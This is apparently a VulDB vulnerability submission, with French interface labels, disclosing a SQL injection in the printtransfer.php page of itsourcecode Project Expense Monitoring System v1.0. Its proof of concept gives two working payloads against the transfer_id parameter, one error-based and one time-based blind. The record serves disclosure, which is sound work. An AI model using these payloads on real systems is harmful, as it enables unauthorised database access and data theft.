| Titre | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| Description | There is a SQLi injection vulnerability in the printtransfer.php page. An attacker can obtain sensitive data in the database by passing special SQL statements in the "$_GET['transfer_id']" parameter.
POC:
Parameter: transfer_id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: transfer_id=14' AND GTID_SUBSET(CONCAT(0x716b766271,(SELECT (ELT(7990=7990,1))),0x716a787871),7990)-- MmbY
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: transfer_id=14' AND (SELECT 8863 FROM (SELECT(SLEEP(5)))rlpX)-- XQNN |
|---|
| La source | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-5.md |
|---|
| Utilisateur | GUOTINGTING (UID 73614) |
|---|
| Soumission | 17/08/2024 14:17 (il y a 2 ans) |
|---|
| Modérer | 19/08/2024 16:12 (2 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 275122 [itsourcecode Project Expense Monitoring System 1.0 printtransfer.php transfer_id injection SQL] |
|---|
| Points | 20 |
|---|